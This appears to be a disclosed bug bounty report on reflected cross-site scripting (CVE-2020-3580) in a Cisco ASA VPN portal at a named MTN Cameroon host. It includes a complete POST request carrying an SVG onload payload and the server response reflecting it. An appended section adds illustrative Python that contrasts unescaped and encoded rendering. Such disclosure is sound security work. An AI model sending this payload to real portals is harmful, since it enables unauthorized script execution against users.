Reflected Cross Site Scripting Cisco ASA on myvpn.mtncameroon.net CVE-2020-3580
Medium
Vulnerability Details
## Summary:
Hello, I would like to report this vulnerability to MTN: Cross Site Scripting on Cisco ASA, CVE-2020-3580.
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device.
## Steps To Reproduce:
### How we can reproduce the issue
1. Go to https://myvpn.mtncameroon.net
2. Intercept the request with Burp Suite and send this "POST" request; we will see a response with JavaScript.
* Request
```
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: myvpn.mtncameroon.net
Cookie: webvpnlogin=1; webvpnLang=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
Content-Length: 42

SAMLResponse="><svg/onload=alert('Renzi')>
```
* Response
```html
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 30 Jun 2021 00:59:25 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 761

<html>
<head>
<script>
function submit_saml() {
document.cookie = "webvpnlogin=1; path=/; secure";
document.createElement('form').submit.call(document.getElementById('samlform'));
}
</script>
</head>
<body onload="submit_saml()">
<form id="samlform" action="/+webvpn+/index.html" method="POST">
<input type="hidden" name="tgroup" value="">
<input type="hidden" name="next" value="">
<input type="hidden" name="tgcookieset" value="">
<input type="hidden" name="group_list" value="a">
<input type="hidden" name="username" value="">
<input type="hidden" name="password" value="">
<input type="hidden" name="SAMLResponse" value=""><svg/onload=alert('Renzi')>">
<input type="submit" name="Login" value="Login" style="display:none;">
</form>
</body>
</html>
```
3. Response with JavaScript alert, proof of concept XSS.
## Supporting Material/References:
* https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-asaftd-xss-multiple-FCB3vPZe.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3580
## Impact
A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information.
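
The following is an added example, not part of the original report and not Cisco's code. It is a hypothetical Python re-creation of the reflected form, showing why the `SAMLResponse` value in the response above breaks out of the `value` attribute and how HTML attribute encoding keeps the same input inert. The template, function names and audit helper are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Hypothetical re-creation of the reflected form; not Cisco's code.
FORM = ('<form id="samlform" action="/+webvpn+/index.html" method="POST">\n'
        '<input type="hidden" name="group_list" value="{tgname}">\n'
        '<input type="hidden" name="SAMLResponse" value="{saml}">\n'
        '</form>')

def render_unsafe(tgname, saml):
    """Request values copied verbatim into the attribute (the reported behaviour)."""
    return FORM.format(tgname=tgname, saml=saml)

def render_safe(tgname, saml):
    """Same template with HTML attribute encoding applied to each value."""
    return FORM.format(tgname=html.escape(tgname, quote=True),
                       saml=html.escape(saml, quote=True))

class _Audit(HTMLParser):
    """Collects every start tag and the value of each named input."""
    def __init__(self):
        super().__init__()
        self.tags, self.inputs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        a = dict(attrs)
        if tag == "input" and "name" in a:
            self.inputs[a["name"]] = a.get("value")

def audit(markup):
    """Return (tags outside the expected form/input set, parsed input values)."""
    p = _Audit()
    p.feed(markup)
    p.close()
    unexpected = [t for t in p.tags if t not in ("form", "input")]
    return unexpected, p.inputs

if __name__ == "__main__":
    sample = "\"><svg/onload=alert('Renzi')>"  # value from the request above
    for render in (render_unsafe, render_safe):
        print(render.__name__, audit(render("a", sample)))
```

With the encoded template the parser sees only the expected `form` and `input` elements and the submitted string round-trips as plain attribute data; the same audit can serve as a regression test for any handler that echoes request parameters into hidden fields.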
Report Stats
- Report ID: 1247833
- State: Closed
- Substate: resolved
- Upvotes: 22